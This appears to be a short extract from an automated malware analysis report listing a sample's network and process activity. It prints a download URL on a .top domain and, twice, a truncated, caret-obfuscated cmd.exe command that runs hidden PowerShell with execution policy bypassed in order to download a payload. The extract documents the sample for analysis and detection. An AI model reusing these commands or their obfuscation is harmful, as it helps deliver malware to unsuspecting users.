Technical Information
- http://www.zonedopesa.top/read.php?f=1.gif as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^Ow^eRSH^E^LL.E^xE -eXEC^UtioNpol^icy BYp^A^S^s^ ^-NopR^o^F^i^L^e -^winDO^w^st^ylE H^Idd^En^ (nE^W-^O^bJEct^ s^yST^Em^.nEt.w^EbcLIE^Nt^).dO^w^n^LOA^dFi^L^e('http://www.zonedopesa.t...
- DNS ASK zo###opesa.top
- '<SYSTEM32>\cmd.exe' /c "P^Ow^eRSH^E^LL.E^xE -eXEC^UtioNpol^icy BYp^A^S^s^ ^-NopR^o^F^i^L^e -^winDO^w^st^ylE H^Idd^En^ (nE^W-^O^bJEct^ s^yST^Em^.nEt.w^EbcLIE^Nt^).dO^w^n^LOA^dFi^L^e('http://www.zonedopesa.t...' (with hidden window)